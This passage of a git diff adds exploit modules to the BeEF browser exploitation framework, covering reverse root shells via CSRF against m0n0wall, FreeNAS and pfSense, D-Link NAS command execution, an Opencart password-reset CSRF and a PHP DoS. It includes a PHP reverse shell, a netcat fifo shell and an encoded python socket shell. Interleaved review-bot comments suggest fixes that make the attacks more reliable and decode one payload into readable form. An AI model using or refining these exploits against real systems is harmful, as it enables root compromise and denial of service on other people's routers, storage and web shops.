and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. 
+ + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License along + with this program; if not, write to the Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. + +Also add information on how to contact you by electronic and paper mail. + +If the program is interactive, make it output a short notice like this +when it starts in an interactive mode: + + Gnomovision version 69, Copyright (C) year name of author + Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. + This is free software, and you are welcome to redistribute it + under certain conditions; type `show c' for details. + +The hypothetical commands `show w' and `show c' should show the appropriate +parts of the General Public License. Of course, the commands you use may +be called something other than `show w' and `show c'; they could even be +mouse-clicks or menu items--whatever suits your program. + +You should also get your employer (if you work as a programmer) or your +school, if any, to sign a "copyright disclaimer" for the program, if +necessary. Here is a sample; alter the names: + + Yoyodyne, Inc., hereby disclaims all copyright interest in the program + `Gnomovision' (which makes passes at compilers) written by James Hacker. + + , 1 April 1989 + Ty Coon, President of Vice + +This General Public License does not permit incorporating your program into +proprietary programs. If your program is a subroutine library, you may +consider it more useful to permit linking proprietary applications with the +library. If this is what you want to do, use the GNU Lesser General +Public License instead of this License. 
diff --git a/modules/exploits/m0n0wall/COPYING.PHP-REVERSE-SHELL b/modules/exploits/m0n0wall/COPYING.PHP-REVERSE-SHELL
new file mode 100644
index 000000000..35307c70a
--- /dev/null
+++ b/modules/exploits/m0n0wall/COPYING.PHP-REVERSE-SHELL
@@ -0,0 +1,6 @@
+This tool may be used for legal purposes only. Users take full responsibility
+for any actions performed using this tool. The author accepts no liability for
+damage caused by this tool. If these terms are not acceptable to you, then do
+not use this tool.
+
+In all other respects the GPL version 2 applies.
diff --git a/modules/exploits/m0n0wall/command.js b/modules/exploits/m0n0wall/command.js
new file mode 100644
index 000000000..0e0981fda
--- /dev/null
+++ b/modules/exploits/m0n0wall/command.js
@@ -0,0 +1,34 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+ var rhost = '<%= @rhost %>';
+ var rport = '<%= @rport %>';
+ var lhost = '<%= @lhost %>';
+ var lport = '<%= @lport %>';
+
+ var uri = "http://" + rhost + ":" + rport + "/exec_raw.php?cmd=echo%20-e%20%22%23%21%2Fusr%2Flocal%2Fbin%2Fphp%5Cn%3C%3Fphp%20eval%28%27%3F%3E%20%27.file_get_contents%28%27" + beef.net.httpproto + "%3A%2F%2F" + beef.net.host + ":" + beef.net.port + "%2Fphp-reverse-shell.php%27%29.%27%3C%3Fphp%20%27%29%3B%20%3F%3E%22%20%3E%20x.php%3Bcat%20x.php%3Bchmod%20755%20x.php%3B";
+
+ beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){
+ if(response.status_code == 200){
+ function triggerReverseConn(){
+ beef.net.forge_request("http", "GET", rhost, rport, "/x.php?ip=" + lhost + "&port=" + lport, null, null, null, 10, 'script', true, null,function(response){
+ if(response.status_code == 200){
+ beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse shell should have been triggered.");
+ }else{
+ beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: second GET request failed.");
+ }
+ });
+ }
+ setTimeout(triggerReverseConn,5000);
+ }else{
+ beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: first GET request failed.");
+ }
+ });
+
+
+});
+
diff --git a/modules/exploits/m0n0wall/config.yaml b/modules/exploits/m0n0wall/config.yaml
new file mode 100644
index 000000000..d821ad28d
--- /dev/null
+++ b/modules/exploits/m0n0wall/config.yaml
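Review bot: `lhost` is pasted into `/x.php?ip=…` with no check that it is non-empty, yet the module.rb added in this same commit deliberately blanks the default when BeEF listens on `0.0.0.0`, so a forgotten field still fires the CSRF and the target attempts a connect-back to an empty address. Guard before the first `forge_request`: `if (!lhost || !lport) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=ERROR: lhost/lport not set."); return; }`. The `cat x.php` in the injected command produces output the hooked page can never read (the request is forged with the `'script'` type, whose body is not exposed to the caller as far as this file shows), and nothing removes `x.php` afterwards, so the dropped file persists in the m0n0wall webroot; a follow-up request running `rm x.php` once the shell is triggered would tidy that up. `beef.net.host`, `lhost` and `lport` are also inserted into an otherwise percent-encoded command without `encodeURIComponent`, which holds for IPv4 literals and plain hostnames but nothing else.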
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ monowall_reverse_root_shell_csrf:
+ enable: true
+ category: "Exploits"
+ name: "m0n0wall Reverse Root Shell CSRF"
+ description: "Attempts to get a reverse root shell on a m0n0wall 1.33
Vulnerablity found and PoC provided by Yann CAM @ Synetis.
For more information refer to http://www.exploit-db.com/exploits/23202/
Patched in version 1.34.
This exploit make use of php-reverse-shell from Pentest Monkey."
+ authors: ["bmantra"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/m0n0wall/module.rb b/modules/exploits/m0n0wall/module.rb
new file mode 100644
index 000000000..386f2b9c8
--- /dev/null
+++ b/modules/exploits/m0n0wall/module.rb
@@ -0,0 +1,28 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Monowall_reverse_root_shell_csrf < BeEF::Core::Command
+ def pre_send
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/m0n0wall/php-reverse-shell.php', '/php-reverse-shell', 'php')
+ end
+
+ def self.options
+ configuration = BeEF::Core::Configuration.instance
+ lhost = "#{configuration.get("beef.http.host")}"
+ lhost = "" if lhost == "0.0.0.0"
+ return [
+ { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'},
+ { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
+ { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost},
+ { 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444'}
+ ]
+ end
+
+ def post_execute
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('php-reverse-shell.php')
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/exploits/m0n0wall/php-reverse-shell.php b/modules/exploits/m0n0wall/php-reverse-shell.php
new file mode 100644
index 000000000..e557dee63
--- /dev/null
+++ b/modules/exploits/m0n0wall/php-reverse-shell.php
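Review bot: `self.options` seeds `lhost` from `beef.http.host` only, while the signed_applet_dropper module in this same commit reads `beef.http.public || beef.http.host`; when BeEF sits behind NAT the address the m0n0wall box must connect back to is the public one, so use `lhost = "#{configuration.get("beef.http.public") || configuration.get("beef.http.host")}"` ahead of the `0.0.0.0` blanking. `post_execute` unbinds `php-reverse-shell.php` as soon as the first result arrives, so two runs in flight against different targets appear to race — the second target's `file_get_contents` may hit an already-unbound path — though AssetHandler's exact semantics are not visible here. A why-comment on that line, `# unbind once x.php has fetched it so the shell source is not served indefinitely`, would make the intent and the single-run assumption explicit.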
@@ -0,0 +1,204 @@ + array("pipe", "r"), // stdin is a pipe that the child will read from + 1 => array("pipe", "w"), // stdout is a pipe that the child will write to + 2 => array("pipe", "w") // stderr is a pipe that the child will write to +); + +$process = proc_open($shell, $descriptorspec, $pipes); + +if (!is_resource($process)) { + printit("ERROR: Can't spawn shell"); + exit(1); +} + +// Set everything to non-blocking +// Reason: Occsionally reads will block, even though stream_select tells us they won't +stream_set_blocking($pipes[0], 0); +stream_set_blocking($pipes[1], 0); +stream_set_blocking($pipes[2], 0); +stream_set_blocking($sock, 0); + +printit("Successfully opened reverse shell to $ip:$port"); + +while (1) { + // Check for end of TCP connection + if (feof($sock)) { + printit("ERROR: Shell connection terminated"); + break; + } + + // Check for end of STDOUT + if (feof($pipes[1])) { + printit("ERROR: Shell process terminated"); + break; + } + + // Wait until a command is end down $sock, or some + // command output is available on STDOUT or STDERR + $read_a = array($sock, $pipes[1], $pipes[2]); + $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); + + // If we can read from the TCP socket, send + // data to process's STDIN + if (in_array($sock, $read_a)) { + if ($debug) printit("SOCK READ"); + $input = fread($sock, $chunk_size); + if ($debug) printit("SOCK: $input"); + fwrite($pipes[0], $input); + } + + // If we can read from the process's STDOUT + // send data down tcp connection + if (in_array($pipes[1], $read_a)) { + if ($debug) printit("STDOUT READ"); + $input = fread($pipes[1], $chunk_size); + if ($debug) printit("STDOUT: $input"); + fwrite($sock, $input); + } + + // If we can read from the process's STDERR + // send data down tcp connection + if (in_array($pipes[2], $read_a)) { + if ($debug) printit("STDERR READ"); + $input = fread($pipes[2], $chunk_size); + if ($debug) printit("STDERR: $input"); + fwrite($sock, $input); + } +} + 
+fclose($sock);
+fclose($pipes[0]);
+fclose($pipes[1]);
+fclose($pipes[2]);
+proc_close($process);
+
+// Like print, but does nothing if we've daemonised ourself
+// (I can't figure out how to redirect STDOUT like a proper daemon)
+function printit ($string) {
+ if (!$daemon) {
+ print "$string\n";
+ }
+}
+
+?>
+
+
+
diff --git a/modules/exploits/nas/dlink_sharecenter_cmd_exec/command.js b/modules/exploits/nas/dlink_sharecenter_cmd_exec/command.js
new file mode 100644
index 000000000..ba11e3d10
--- /dev/null
+++ b/modules/exploits/nas/dlink_sharecenter_cmd_exec/command.js
@@ -0,0 +1,27 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var gateway = '<%= @base %>';
+ var path = '/cgi-bin/system_mgr.cgi';
+ var cmd = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+ var timeout = 15;
+
+ var dlink_sharecenter_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
+ {'type':'hidden', 'name':'cmd', 'value':'cgi_sms_test'},
+ {'type':'hidden', 'name':'command1', 'value':cmd}
+ ]);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+ cleanup = function() {
+ document.body.removeChild(dlink_sharecenter_iframe_<%= @command_id %>);
+ }
+ setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/nas/dlink_sharecenter_cmd_exec/config.yaml b/modules/exploits/nas/dlink_sharecenter_cmd_exec/config.yaml
new file mode 100644
index 000000000..7738d32b2
--- /dev/null
+++ b/modules/exploits/nas/dlink_sharecenter_cmd_exec/config.yaml
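Review bot: `cleanup` is assigned without `var`, so it is a page-global shared with every other module that uses the same idiom (the freenas, opencart and pfsense modules in this commit included); if two commands run inside the 15 s window the later assignment wins, one iframe is never removed and the other `removeChild` throws. The iframe variable is already suffixed with `<%= @command_id %>` to avoid exactly this collision, so finish the job with a closure instead of the string form: `setTimeout(function() { document.body.removeChild(dlink_sharecenter_iframe_<%= @command_id %>); }, timeout*1000);`. Separately, `path` starts with `/` while the module's default `base` (`http://192.168.0.1/`) already ends with one, producing `http://192.168.0.1//cgi-bin/system_mgr.cgi`; the 3com module uses `'utility.cgi'` without the slash, and the same convention would be safer here.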
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ dlink_sharecenter_cmd_exec:
+ enable: true
+ category: ["Exploits", "NAS"]
+ name: "D-Link ShareCenter Command Execution"
+ description: "Attempts to execute arbitrary commands on a D-Link ShareCenter NAS. Multiple models are affected, including DNS-320 and DNS-325, however this module has not been tested.

For more information see, http://blog.emaze.net/2012_02_01_archive.html"
+ authors: ["bcoles", "Roberto Paleari, Emaze Networks S.p.A."]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/nas/dlink_sharecenter_cmd_exec/module.rb b/modules/exploits/nas/dlink_sharecenter_cmd_exec/module.rb
new file mode 100644
index 000000000..7bdc07991
--- /dev/null
+++ b/modules/exploits/nas/dlink_sharecenter_cmd_exec/module.rb
@@ -0,0 +1,23 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# This module has not been tested. For more information see:
+# http://blog.emaze.net/2012_02_01_archive.html
+# http://www.securityfocus.com/archive/1/521532
+###
+class Dlink_sharecenter_cmd_exec < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name'=>'base', 'ui_label'=>'Router web root', 'value'=>'http://192.168.0.1/'},
+ {'name'=>'cmd', 'ui_label'=>'Command', 'value'=>'ls'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/exploits/nas/freenas_reverse_root_shell_csrf/command.js b/modules/exploits/nas/freenas_reverse_root_shell_csrf/command.js
new file mode 100644
index 000000000..d4d663c23
--- /dev/null
+++ b/modules/exploits/nas/freenas_reverse_root_shell_csrf/command.js
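Review bot: The `base` option is labelled `'Router web root'` although this module targets a NAS; `'ui_label'=>'NAS web root'` reads correctly in the UI. The `cmd` option is interpolated into command.js with only the two quote characters escaped, so a backslash or a line break in the value would leave the generated script unparsable and the command would never report back; if such values are expected, either strip them here or emit the value JSON-encoded on the JS side. The "has not been tested" caveat in the header is useful and should stay until someone confirms the module against a DNS-320/325.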
@@ -0,0 +1,25 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+ var rhost = '<%= @rhost %>';
+ var rport = '<%= @rport %>';
+ var lhost = '<%= @lhost %>';
+ var lport = '<%= @lport %>';
+ var sid = Math.floor(Math.random()*1000)+1;
+
+ var freenas_add_user_iframe = beef.dom.createInvisibleIframe();
+ freenas_add_user_iframe.setAttribute('src', 'http://'+rhost+':'+rport+'/system/terminal/?s='+sid+'&k=%70%79%74%68%6f%6e%20%2d%63%20%22%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%2c%6f%73%3b%68%6f%73%74%3d%5c%22'+lhost+'%5c%22%3b%70%6f%72%74%3d'+lport+'%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%68%6f%73%74%2c%70%6f%72%74%29%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%30%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%31%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%32%29%3b%70%3d%73%75%62%70%72%6f%63%65%73%73%2e%63%61%6c%6c%28%5b%5c%22%2f%62%69%6e%2f%73%68%5c%22%2c%5c%22%2d%69%5c%22%5d%29%3b%22%0d');
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+ cleanup = function() {
+ document.body.removeChild(freenas_add_user_iframe);
+ }
+ setTimeout("cleanup()", 15000);
+
+});
+
diff --git a/modules/exploits/nas/freenas_reverse_root_shell_csrf/config.yaml b/modules/exploits/nas/freenas_reverse_root_shell_csrf/config.yaml
new file mode 100644
index 000000000..10d83aaaa
--- /dev/null
+++ b/modules/exploits/nas/freenas_reverse_root_shell_csrf/config.yaml
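Review bot: `lhost` and `lport` are concatenated raw into the query string between two percent-encoded fragments, so a reserved character typed into either option (`&`, `#`, a space) is consumed by the URL parser instead of reaching the terminal, and the hex blob cannot be reviewed for what it executes without decoding it by hand. Building the command as plain text and passing it through `encodeURIComponent` puts the same bytes on the wire (the blob decodes to a `python -c` reverse shell to lhost:lport, terminated by a CR) while making the payload readable; see the rewrite below. The name `freenas_add_user_iframe` describes a different technique than the `/system/terminal/` request it carries; `freenas_terminal_iframe` would be truthful. `cleanup` is also an implicit global shared with the other modules that use this idiom.
```javascript
  var sid = Math.floor(Math.random()*1000)+1;

  // Plain-text form of the `k` parameter: python reverse shell to lhost:lport, CR-terminated
  var payload = 'python -c "import socket,subprocess,os;' +
    'host=\\"' + lhost + '\\";port=' + lport + ';' +
    's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));' +
    'os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);' +
    'p=subprocess.call([\\"/bin/sh\\",\\"-i\\"]);"\r';

  var freenas_add_user_iframe = beef.dom.createInvisibleIframe();
  freenas_add_user_iframe.setAttribute('src', 'http://' + rhost + ':' + rport +
    '/system/terminal/?s=' + sid + '&k=' + encodeURIComponent(payload));
  // … unchanged: beef.net.send, cleanup …
```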
@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+################################################################################
+# For more information see: http://support.freenas.org/ticket/1788
+################################################################################
+beef:
+ module:
+ freenas_reverse_root_shell_csrf:
+ enable: true
+ category: ["Exploits", "NAS"]
+ name: "FreeNAS Reverse Root Shell CSRF"
+ description: "Attempts to get a reverse root shell on a FreeNAS server.
Tested on version 8.2.0 however other versions are likely to be vulnerable.
Patched in version 8.3.0-BETA3."
+ authors: ["bcoles"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/nas/freenas_reverse_root_shell_csrf/module.rb b/modules/exploits/nas/freenas_reverse_root_shell_csrf/module.rb
new file mode 100644
index 000000000..bf5c68304
--- /dev/null
+++ b/modules/exploits/nas/freenas_reverse_root_shell_csrf/module.rb
@@ -0,0 +1,27 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+################################################################################
+# For more information see: http://support.freenas.org/ticket/1788
+################################################################################
+class Freenas_reverse_root_shell_csrf < BeEF::Core::Command
+
+ def self.options
+ configuration = BeEF::Core::Configuration.instance
+ lhost = "#{configuration.get("beef.http.host")}"
+ lhost = "" if lhost == "0.0.0.0"
+ return [
+ { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'},
+ { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
+ { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost},
+ { 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444'},
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/exploits/opencart_reset_password/command.js b/modules/exploits/opencart_reset_password/command.js
new file mode 100644
index 000000000..54747a048
--- /dev/null
+++ b/modules/exploits/opencart_reset_password/command.js
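Review bot: `lhost = "" if lhost == "0.0.0.0"` needs a comment — a wildcard bind address is not something the target can connect back to, so the default is blanked to force the operator to fill it in, but without the comment the next reader will take the line for a bug. Suggested: `# 0.0.0.0 is BeEF's bind address, not one the target can reach; leave blank so the operator must supply it`. Nothing rejects an empty `lhost` at send time, though, so a forgotten value reaches command.js and lands in the payload as `host=\"\"`; a guard on one side or the other would turn that into a `fail=` instead of a silent no-op. The same three lines are copy-pasted into the m0n0wall and pfsense modules in this commit and would be better as one shared helper.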
@@ -0,0 +1,24 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+ var base = '<%= @base %>';
+ var password = '<%= @password %>';
+
+ var opencart_reset_password_iframe = beef.dom.createIframeXsrfForm(base, "POST", [
+ {'type':'hidden', 'name':'password', 'value':password},
+ {'type':'hidden', 'name':'confirm', 'value':password}
+ ]);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+ cleanup = function() {
+ document.body.removeChild(opencart_reset_password_iframe);
+ }
+ setTimeout("cleanup()", 15000);
+
+});
+
diff --git a/modules/exploits/opencart_reset_password/config.yaml b/modules/exploits/opencart_reset_password/config.yaml
new file mode 100644
index 000000000..16ccacece
--- /dev/null
+++ b/modules/exploits/opencart_reset_password/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ opencart_reset_password:
+ enable: true
+ category: "Exploits"
+ name: "Opencart Reset Password CSRF"
+ description: "Attempts to reset an Opencart user's password."
+ authors: ["Saadat Ullah", "bcoles"]
+ target:
+ unknown: ["ALL"]
diff --git a/modules/exploits/opencart_reset_password/module.rb b/modules/exploits/opencart_reset_password/module.rb
new file mode 100644
index 000000000..569c2bc2c
--- /dev/null
+++ b/modules/exploits/opencart_reset_password/module.rb
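Review bot: `var password = '<%= @password %>';` (and `base` above it) is dropped into a single-quoted JS literal with no escaping, whereas the dlink module in this commit escapes `'` and `"` in the same situation; a chosen password containing `'` or `\` turns the whole `beef.execute` body into a syntax error and the command never reports back. Apply the same treatment: `var password = '<%= @password.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';`. `cleanup` is an implicit global shared across modules; passing a closure to `setTimeout` instead of the `"cleanup()"` string avoids the collision when two commands overlap.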
@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# This module has not been tested
+class Opencart_reset_password < BeEF::Core::Command
+
+ def self.options
+ return [
+ { 'name' => 'base', 'ui_label' => 'Opencart path', 'value' => 'http://example.com/index.php?route=account/password'},
+ { 'name' => 'password', 'ui_label' => 'Password', 'value' => 'beefbeef'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/exploits/pfsense/command.js b/modules/exploits/pfsense/command.js
new file mode 100644
index 000000000..4b596a099
--- /dev/null
+++ b/modules/exploits/pfsense/command.js
@@ -0,0 +1,24 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+ var rhost = '<%= @rhost %>';
+ var rport = '<%= @rport %>';
+ var lhost = '<%= @lhost %>';
+ var lport = '<%= @lport %>';
+
+ var pfsense_iframe = beef.dom.createIframeXsrfForm("https://" + rhost + ":" + rport +"/system_firmware.php", "POST",
+ [{'type':'hidden', 'name':'kerneltype', 'value':'SMP > /boot/kernel/pfsense_kernel.txt;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ' + lhost + ' ' + lport + ' >/tmp/f &'}]);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+ cleanup = function() {
+ document.body.removeChild(pfsense_iframe);
+ }
+ setTimeout("cleanup()", 15000);
+
+});
+
diff --git a/modules/exploits/pfsense/config.yaml b/modules/exploits/pfsense/config.yaml
new file mode 100644
index 000000000..defde80f8
--- /dev/null
+++ b/modules/exploits/pfsense/config.yaml
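Review bot: Nothing in the pfsense command.js rejects an empty `lhost`, which is exactly what module.rb hands over when BeEF is bound to 0.0.0.0; the injected command then reads `nc  4444 >/tmp/f`, netcat fails on the router and the operator still sees `result=exploit attempted`. A guard before the form is built keeps the report honest: `if (!lhost) { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=lhost is not set'); return; }`. Unlike the dlink, qnx and 3com modules in this commit, `pfsense_iframe` carries no `<%= @command_id %>` suffix, and `cleanup` is an implicit global, so two overlapping sends clobber each other's teardown.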
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ pfsense_reverse_root_shell_csrf:
+ enable: true
+ category: "Exploits"
+ name: "pfSense Reverse Root Shell CSRF"
+ description: "Attempts to get a reverse root shell on a pfSense 2.0.1 firewall/router.
Vulnerablity found and PoC provided by Yann CAM @ Synetis.
The method described by Jeff Price has been used to create a reverse shell with netcat.
For more information refer to http://www.exploit-db.com/exploits/23901/
Patched in version 2.0.2."
+ authors: ["bmantra"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/pfsense/module.rb b/modules/exploits/pfsense/module.rb
new file mode 100644
index 000000000..8e7829ca4
--- /dev/null
+++ b/modules/exploits/pfsense/module.rb
@@ -0,0 +1,24 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Pfsense_reverse_root_shell_csrf < BeEF::Core::Command
+
+ def self.options
+ configuration = BeEF::Core::Configuration.instance
+ lhost = "#{configuration.get("beef.http.host")}"
+ lhost = "" if lhost == "0.0.0.0"
+ return [
+ { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'},
+ { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '443' },
+ { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost},
+ { 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/exploits/php-5.3.9-dos/command.js b/modules/exploits/php-5.3.9-dos/command.js
new file mode 100644
index 000000000..ead546736
--- /dev/null
+++ b/modules/exploits/php-5.3.9-dos/command.js
@@ -0,0 +1,52 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+// Simple proof of concept for PHP 5.3.9 DoS bug (CVE-2012-0830)
+// PoC written by Paul Westin
+// PoC ported to BeEF by bcoles
+// Bug discovered by Stefan Esser (@i0n1c)
+// For more information see http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/
+
+// Generate 1000 normal keys and one array
+function createEvilObj () {
+ var evil_obj = {};
+ for (var i = 0; i < 1001; i++) {
+ evil_obj[i] = 1;
+ }
+ evil_obj['kill[]'] = 'kill';
+ return evil_obj;
+}
+
+// Serialize Javascript object into POST data
+function serializeObj (obj) {
+ var str = [];
+ for(var p in obj) {
+ str.push(p + "=" + obj[p]);
+ }
+ return str.join("&");
+}
+
+// Run attack
+function php_dos (target_url) {
+ var bad = serializeObj(createEvilObj());
+ var xhr = new XMLHttpRequest();
+ xhr.open("POST", target_url, true);
+ xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
+ xhr.setRequestHeader('Content-Length', bad.length);
+ xhr.send(bad);
+}
+
+try {
+ php_dos("<%= @url %>");
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=DoS request sent");
+} catch (e) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, "fail=request failed with error: "+e.toString());
+}
+
+});
+
diff --git a/modules/exploits/php-5.3.9-dos/config.yaml b/modules/exploits/php-5.3.9-dos/config.yaml
new file mode 100644
index 000000000..9b4730c2c
--- /dev/null
+++ b/modules/exploits/php-5.3.9-dos/config.yaml
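Review bot: `xhr.setRequestHeader('Content-Length', bad.length);` should go — `Content-Length` is a forbidden request header for XMLHttpRequest, so browsers either ignore the call or throw, and a throw here is caught by the surrounding try/catch and reported as a spurious `fail=request failed`. The browser computes the body length itself; `bad.length` would in any case be a UTF-16 unit count, not a byte count. `result=DoS request sent` is also reported the moment `xhr.send` returns, before anything has reached the network, so the only failures this module can ever observe are synchronous ones; wiring `xhr.onerror` to a `fail=` send would make the result meaningful. The non-encoded `kill[]` key looks deliberate (PHP must see the brackets to build an array), and a comment saying so would stop someone from "fixing" it with `encodeURIComponent`.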
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ php_dos:
+ enable: true
+ category: "Exploits"
+ name: "PHP 5.3.9 DoS"
+ description: "This module uses the zombie browser to exploit a denial of service bug in PHP 5.3.9 (CVE-2012-0830).

For more information, see http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/."
+ authors: ["bcoles", "Paul Westin", "Stefan Esser"]
+ target:
+ unknown: ["ALL"]
diff --git a/modules/exploits/php-5.3.9-dos/module.rb b/modules/exploits/php-5.3.9-dos/module.rb
new file mode 100644
index 000000000..a84fa99f1
--- /dev/null
+++ b/modules/exploits/php-5.3.9-dos/module.rb
@@ -0,0 +1,22 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
